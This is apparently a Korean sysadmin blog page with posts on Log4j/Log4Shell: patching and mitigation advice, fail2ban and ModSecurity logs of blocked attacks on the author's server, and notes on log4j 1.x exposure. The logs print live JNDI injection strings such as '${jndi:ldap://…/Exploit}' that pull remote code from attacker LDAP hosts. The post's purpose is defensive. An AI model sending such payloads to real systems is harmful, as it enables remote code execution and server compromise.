728x90
반응형

/AnhLab/ Log4j (로그4j) 취약점, 이렇게 대응하세요! 

 

 

4. 취약점 대응 방안

로그4j 취약점을 악용한 위협들에 노출되지 않기 위해 보안 업데이트를 적용해야 한다. 로그4j 취약점은 크게 두 가지 방법으로 대응할 수 있다.

 

1) 2021년 12월 14일 업데이트를 통해 다음과 같이 취약점 패치

  ■ Log4j 2.16.0 이상 최신버전으로 업데이트 (Java8 이상) : https://logging.apache.org/log4j/2.x/download.html

  ■​ Log4j 2.12.2 버전 (Java 7) : 제공 예정​

 

2) Log4j 패치가 어려운 경우 취약점 완화 적용 (ATIP 보안권고문 참조)

​  ■ ​​버전 : Log4j 2.0-beta9 이상 2.15.0 이하 버전 (Log4j 2.12.2 버전 제외)

  JndiLookup 클래스를 다음과 같이 제거

  # zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

​  ■ ​​버전 : Log4j 1.x 버전

  Log4j 1.x에서 JMSAppender 사용 여부 확인 후 해당 기능을 중지​

 

https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?seq=31086&utm_source=CM&utm_medium=eDM&utm_campaign=SL%5FtypeF&utm_content=899 

 

로그4j 2 취약점, 이렇게 대응하세요!

과학기술정보통신부는 지난 12일 '아파치 로그4j 2(Apache Log4j 2)' 서비스에 대한 보안 취약점이 발견됨에 따라 긴급..

www.ahnlab.com

 

#Log4j #로그4j #취약점

728x90
SMALL
Posted by gromet

2021. 12. 16. 17:38 WorkHolic

Log4shell 첫 발생 외

728x90
반응형

Log4shell 첫 발생 외

 

관리중인 서버에 첫번째 log4shell 공격 확인

 

[11/Dec/2021:07:14:50 +0900] [xxx.xxx.xxx.189/sid#a353cf0][rid#b571a40][/${jndi:ldaps://41e1e3ec.probe001.log4j.leakix.net:8443/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:34 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b3a2cd0][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:35 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b18e3d8][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]

 

Log4Shell 차단용 fail2ban 세팅 후 검출

 

The IP 121.4.56.143 has just been banned by Fail2Ban after
1 attempts against apache-log4j.


Here is more information about 121.4.56.143:

[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '121.4.0.0 - 121.5.255.255'

% Abuse contact for '121.4.0.0 - 121.5.255.255' is 'ipas@cnnic.cn'

inetnum:        121.4.0.0 - 121.5.255.255
netname:        TencentCloud
descr:          Tencent cloud computing (Beijing) Co., Ltd.
descr:          Floor 6, Yinke Building,38 Haidian St,
descr:          Haidian District Beijing
country:        CN
admin-c:        JT1125-AP
tech-c:         JX1747-AP
abuse-c:        AC1601-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
last-modified:  2021-06-16T01:32:05Z
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-06-16T01:39:57Z
source:         APNIC

role:           ABUSE CNNICCN
address:        Beijing, China
country:        ZZ
phone:          +000000000
e-mail:         ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
nic-hdl:        AC1601-AP
remarks:        Generated from irt object IRT-CNNIC-CN
abuse-mailbox:  ipas@cnnic.cn
mnt-by:         APNIC-ABUSE
last-modified:  2020-05-14T11:19:01Z
source:         APNIC

person:         James Tian
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-84952
e-mail:         clarkcheng@tencent.com
nic-hdl:        JT1125-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:37:15Z
source:         APNIC

person:         Jimmy Xiao
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-80224
e-mail:         klayliang@tencent.com
nic-hdl:        JX1747-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:38:09Z
source:         APNIC

% Information related to '121.4.0.0/15AS45090'

route:          121.4.0.0/15
origin:         AS45090
descr:          China Internet Network Information Center
                Floor1, Building No.1 C/-Chinese Academy of Sciences
                4, South 4th Street
                Haidian District,
mnt-by:         MAINT-CNNIC-AP
last-modified:  2020-02-25T01:14:09Z
source:         APNIC

% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-JP1)


Lines containing IP:121.4.56.143 in /var/log/httpd/*access_log

/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:51 +0900] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "POST /login HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226


#log4shell #log4j #fail2ban

728x90
SMALL
Posted by gromet
728x90
반응형

 

log4j 1.x가 CVE-2021-44228에 취약합니까?

 

log4j 1.x는  현재 CVE-2021-44228에 영향을 받는 버전으로 나열되지 않았다.
다만 수명 종료로 이미 알려진 이전 보안 문제를 포함하여 더이상 패치나 수정이 제공되지 않는다. 

 

여기 에 대한 의견에 따르면 log4j 1.x의 JMSAppender에 유사한 문제가 있을 수 있지만 JMSAppender가 활성화 되어 있어야 한다는 조건이 있다. 그리고 기본적으로 활성화되어 있는 조건도 아니다.
업데이트: JMSAppender 문제에 식별자: CVE-2021-4104 가 지정되었다.

 

Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2

Restricts access to LDAP via JNDI.

github.com

 

 

JMSAppender를 사용하고 있는지는 아래와 같이 확인할 수 있다.
아래의 파일들에서 log4j 구성을 확인 하여 다음과 같은 JMSAppender또는 SocketAppender( CVE-2019-17571 )을 사용하지 않는지 확인하면된다.

  • log4j.properties
  • logger.xml
  • logging.properties

 

 

면책 조항: 이 페이지의 콘텐츠(및 링크)는 어떤 종류의 보증 없이 있는 그대로 제공됩니다. 자신의 책임하에 사용하십시오. 적절한 보호를 위해 소프트웨어 공급업체에 문의해야 합니다.

 

 

https://www.petefreitag.com/item/923.cfm

 

Log4j CVE-2021-44228 Log4Shell Vulnerability on ColdFusion / Lucee

There is a critical security vulnerability (CVE-2021-44228 aka Log4Shell) in the java library log4j which is a popular logging library for java applications. It is included in both Adobe ColdFusion and Lucee for example. Putting together some info to help

www.petefreitag.com

 

 

#Log4j #Vulnerability

728x90
SMALL

'WorkHolic' 카테고리의 다른 글

아웃룩 OutLook 메일 검색 오류  (0) 2021.12.23
Log4shell 첫 발생 외  (0) 2021.12.16
Apache Log4j 1.2.x 버전 취약점 해결 방법  (0) 2021.12.16
SELinux 설정  (0) 2021.12.10
MySQL Proxy  (0) 2021.11.10
Posted by gromet
이전버튼 1 이전버튼

블로그 이미지
나는 운이 좋은 사람이다 나는 나날이 점점 더 좋아진다 내가 하는 선택과 행동은 반드시 성공으로 이어진다 내게는 인내력과 지속력이 있다 네게는 좋은것들만 모여든다
gromet

공지사항

Yesterday
Today
Total
반응형

달력

 « |  » 2025.1
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

160x600